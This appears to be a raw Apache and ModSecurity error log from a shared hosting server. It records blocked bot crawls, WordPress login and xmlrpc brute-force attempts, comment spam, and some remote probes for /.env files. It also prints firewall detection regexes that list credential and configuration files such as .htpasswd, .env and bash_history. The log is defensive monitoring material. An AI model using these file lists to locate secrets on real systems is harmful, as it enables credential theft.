[Tue May 26 16:58:21.601655 2026] [security2:error] [pid 839808:tid 839953] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD1JqtwAfohijxAqhlfQAAARc"]
[Tue May 26 16:58:22.248136 2026] [security2:error] [pid 839808:tid 839952] [client 74.7.244.44:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.finclass.africa.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWD1pqtwAfohijxAqhlngAAARY"]
[Tue May 26 16:58:22.248876 2026] [security2:error] [pid 839808:tid 840036] [client 74.7.244.44:34580] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.finclass.africa.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWD1pqtwAfohijxAqhlnAABahs"]
[Tue May 26 16:58:22.578405 2026] [autoindex:error] [pid 839808:tid 840022] [client 74.7.243.231:0] AH01276: Cannot serve directory /home2/debatqhn/finclass.africa/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:58:22.821569 2026] [security2:error] [pid 839808:tid 840014] [client 117.198.37.168:52111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWD1pqtwAfohijxAqhlrwAAAVQ"]
[Tue May 26 16:58:22.821718 2026] [security2:error] [pid 839808:tid 840014] [client 117.198.37.168:52111] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWD1pqtwAfohijxAqhlrwAAAVQ"]
[Tue May 26 16:58:23.877635 2026] [security2:error] [pid 839808:tid 840050] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD1pqtwAfohijxAqhlqAAAAXg"]
[Tue May 26 16:58:24.991297 2026] [security2:error] [pid 839808:tid 839944] [client 168.119.53.160:62108] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWD2JqtwAfohijxAqhl2QAAAQ4"], referer: http://ucdc.co.in/
[Tue May 26 16:58:26.360470 2026] [security2:error] [pid 839808:tid 839995] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD2JqtwAfohijxAqhl2AAAAUE"]
[Tue May 26 16:58:27.367103 2026] [security2:error] [pid 839808:tid 839844] [remote 209.42.18.223:34890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWD25qtwAfohijxAqhmAAABKCE"]
[Tue May 26 16:58:27.472560 2026] [core:crit] [pid 839808:tid 840041] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:58:28.111817 2026] [security2:error] [pid 839808:tid 840035] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD2pqtwAfohijxAqhl9QAAAWk"]
[Tue May 26 16:58:29.618601 2026] [security2:error] [pid 839808:tid 840000] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD25qtwAfohijxAqhmEwAAAUY"]
[Tue May 26 16:58:31.996835 2026] [security2:error] [pid 839808:tid 840035] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD3pqtwAfohijxAqhmRwAAAWk"]
[Tue May 26 16:58:32.257154 2026] [security2:error] [pid 839808:tid 840000] [client 176.65.139.233:17790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "quickdeliveryexp.com.onesoft.in"] [uri "/.env"] [unique_id "ahWD4JqtwAfohijxAqhmbwAAAUY"]
[Tue May 26 16:58:33.099051 2026] [security2:error] [pid 839808:tid 839968] [client 117.198.37.168:52366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWD4ZqtwAfohijxAqhmhQAAASY"]
[Tue May 26 16:58:33.099178 2026] [security2:error] [pid 839808:tid 839968] [client 117.198.37.168:52366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWD4ZqtwAfohijxAqhmhQAAASY"]
[Tue May 26 16:58:33.416964 2026] [security2:error] [pid 839808:tid 839947] [client 51.161.65.219:46612] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "xllent.in"] [uri "/robots.txt"] [unique_id "ahWD4ZqtwAfohijxAqhmjQAAARE"]
[Tue May 26 16:58:33.417092 2026] [security2:error] [pid 839808:tid 839947] [client 51.161.65.219:46612] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "xllent.in"] [uri "/robots.txt"] [unique_id "ahWD4ZqtwAfohijxAqhmjQAAARE"]
[Tue May 26 16:58:33.666510 2026] [security2:error] [pid 839808:tid 840026] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD4JqtwAfohijxAqhmbgAAAWA"]
[Tue May 26 16:58:34.788091 2026] [security2:error] [pid 839808:tid 839994] [client 54.39.0.35:37974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "xllent.in"] [uri "/"] [unique_id "ahWD4pqtwAfohijxAqhmpwAAAUA"]
[Tue May 26 16:58:34.788203 2026] [security2:error] [pid 839808:tid 839994] [client 54.39.0.35:37974] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "xllent.in"] [uri "/"] [unique_id "ahWD4pqtwAfohijxAqhmpwAAAUA"]
[Tue May 26 16:58:35.290097 2026] [security2:error] [pid 839808:tid 840005] [client 176.65.139.237:46310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "quickdeliveryexp.com"] [uri "/.env"] [unique_id "ahWD45qtwAfohijxAqhmrQAAAUs"]
[Tue May 26 16:58:35.870600 2026] [security2:error] [pid 839808:tid 840000] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD4pqtwAfohijxAqhmngAAAUY"]
[Tue May 26 16:58:37.206026 2026] [security2:error] [pid 839808:tid 840031] [client 212.34.141.234:54777] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "212.34.141.234" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWD5ZqtwAfohijxAqhm2gAAAWU"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:58:37.206178 2026] [security2:error] [pid 839808:tid 840031] [client 212.34.141.234:54777] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWD5ZqtwAfohijxAqhm2gAAAWU"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:58:37.546158 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD45qtwAfohijxAqhmuQAAAVE"]
[Tue May 26 16:58:37.646556 2026] [security2:error] [pid 839808:tid 839914] [remote 185.227.134.44:52224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWD5ZqtwAfohijxAqhm2wABSWc"]
[Tue May 26 16:58:39.103671 2026] [security2:error] [pid 839808:tid 840027] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD5ZqtwAfohijxAqhm4QAAAWE"]
[Tue May 26 16:58:41.552592 2026] [security2:error] [pid 839808:tid 840021] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD6JqtwAfohijxAqhnGgAAAVs"]
[Tue May 26 16:58:42.393960 2026] [security2:error] [pid 839808:tid 839958] [client 45.81.136.186:42203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.136.81.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWD6ZqtwAfohijxAqhnQQAAARw"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:58:42.394121 2026] [security2:error] [pid 839808:tid 839958] [client 45.81.136.186:42203] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWD6ZqtwAfohijxAqhnQQAAARw"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 16:58:43.367798 2026] [security2:error] [pid 839808:tid 839811] [remote 5.45.96.74:40344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWD65qtwAfohijxAqhnWgABLwA"]
[Tue May 26 16:58:43.782983 2026] [security2:error] [pid 839808:tid 839942] [client 117.198.37.168:52554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWD65qtwAfohijxAqhnZAAAAQw"]
[Tue May 26 16:58:43.783204 2026] [security2:error] [pid 839808:tid 839942] [client 117.198.37.168:52554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWD65qtwAfohijxAqhnZAAAAQw"]
[Tue May 26 16:58:43.975543 2026] [security2:error] [pid 839808:tid 839978] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD6pqtwAfohijxAqhnSwAAATA"]
[Tue May 26 16:58:45.231435 2026] [security2:error] [pid 839808:tid 839870] [remote 173.249.15.100:58308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWD7ZqtwAfohijxAqhnhQABRTs"]
[Tue May 26 16:58:45.234462 2026] [security2:error] [pid 839808:tid 840052] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD65qtwAfohijxAqhnZwAAAXo"]
[Tue May 26 16:58:45.634086 2026] [security2:error] [pid 839808:tid 839968] [client 113.187.243.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD65qtwAfohijxAqhnbQAAASY"]
[Tue May 26 16:58:46.590001 2026] [core:crit] [pid 839808:tid 840047] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:58:46.754096 2026] [security2:error] [pid 839808:tid 840051] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD7ZqtwAfohijxAqhniAAAAXk"]
[Tue May 26 16:58:48.110123 2026] [security2:error] [pid 839808:tid 840040] [client 81.22.193.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWD8JqtwAfohijxAqhnzAAAAW4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:58:48.909902 2026] [security2:error] [pid 839808:tid 840062] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD75qtwAfohijxAqhnyQAAAYQ"]
[Tue May 26 16:58:49.442031 2026] [security2:error] [pid 839808:tid 839987] [client 81.22.193.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWD8ZqtwAfohijxAqhn6QAAATk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 16:58:50.276066 2026] [core:crit] [pid 839808:tid 840066] (13)Permission denied: [client 40.77.167.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:58:50.532541 2026] [security2:error] [pid 839808:tid 839974] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD8ZqtwAfohijxAqhn5QAAASw"]
[Tue May 26 16:58:53.361547 2026] [security2:error] [pid 839808:tid 839944] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD85qtwAfohijxAqhoHgAAAQ4"]
[Tue May 26 16:58:54.541133 2026] [security2:error] [pid 839808:tid 840018] [client 193.37.33.133:39639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 133.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWD9pqtwAfohijxAqhoYAAAAVg"]
[Tue May 26 16:58:54.564541 2026] [security2:error] [pid 839808:tid 840030] [client 81.22.193.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWD9pqtwAfohijxAqhoYwAAAWQ"], referer: https://anujtradingco.com
[Tue May 26 16:58:55.345193 2026] [security2:error] [pid 839808:tid 840008] [client 74.7.228.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "kurgu-afrika.com"] [uri "/robots.txt"] [unique_id "ahWD95qtwAfohijxAqhobgAAAU4"]
[Tue May 26 16:58:55.345838 2026] [security2:error] [pid 839808:tid 840058] [client 74.7.228.15:46992] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "kurgu-afrika.com"] [uri "/robots.txt"] [unique_id "ahWD95qtwAfohijxAqhobAABgGg"]
[Tue May 26 16:58:55.432417 2026] [security2:error] [pid 839808:tid 840036] [client 74.7.228.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kurgu-afrika.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWD95qtwAfohijxAqhodAAAAWo"], referer: https://kurgu-afrika.com/robots.txt
[Tue May 26 16:58:55.433842 2026] [security2:error] [pid 839808:tid 840023] [client 74.7.228.15:46992] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kurgu-afrika.com"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahWD95qtwAfohijxAqhocgABXXM"], referer: https://kurgu-afrika.com/robots.txt
[Tue May 26 16:58:56.144201 2026] [security2:error] [pid 839808:tid 839973] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD9ZqtwAfohijxAqhoWwAAASs"]
[Tue May 26 16:58:57.019529 2026] [security2:error] [pid 839808:tid 839943] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD95qtwAfohijxAqhoegAAAQ0"]
[Tue May 26 16:58:57.099326 2026] [security2:error] [pid 839808:tid 839993] [client 85.208.96.202:11178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-06-18/"] [unique_id "ahWD-ZqtwAfohijxAqhonwAAAT8"]
[Tue May 26 16:58:57.099526 2026] [security2:error] [pid 839808:tid 839993] [client 85.208.96.202:11178] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2024-06-18/"] [unique_id "ahWD-ZqtwAfohijxAqhonwAAAT8"]
[Tue May 26 16:58:58.035735 2026] [security2:error] [pid 839808:tid 840057] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD-JqtwAfohijxAqholAAAAX8"]
[Tue May 26 16:59:00.572514 2026] [security2:error] [pid 839808:tid 840032] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD-5qtwAfohijxAqho0AAAAWY"]
[Tue May 26 16:59:01.063472 2026] [security2:error] [pid 839808:tid 840043] [client 103.181.181.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWD_ZqtwAfohijxAqho8gAAAXE"], referer: http://www.Anujtradingco.com/
[Tue May 26 16:59:01.523217 2026] [security2:error] [pid 839808:tid 839968] [client 103.181.181.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWD_ZqtwAfohijxAqhpBAAAASY"], referer: http://www.Anujtradingco.com/
[Tue May 26 16:59:02.304148 2026] [security2:error] [pid 839808:tid 840031] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWD_ZqtwAfohijxAqho-QAAAWU"]
[Tue May 26 16:59:02.717333 2026] [security2:error] [pid 839808:tid 839854] [remote 5.42.158.148:36050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWD_pqtwAfohijxAqhpHQABaSs"]
[Tue May 26 16:59:04.117869 2026] [security2:error] [pid 839808:tid 839890] [remote 47.128.23.175:15334] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.karuppuswamykovil.in"] [uri "/images/carousel-01.jpg"] [unique_id "ahWEAJqtwAfohijxAqhpTQABaU8"], referer: https://pesinos.vercel.app/
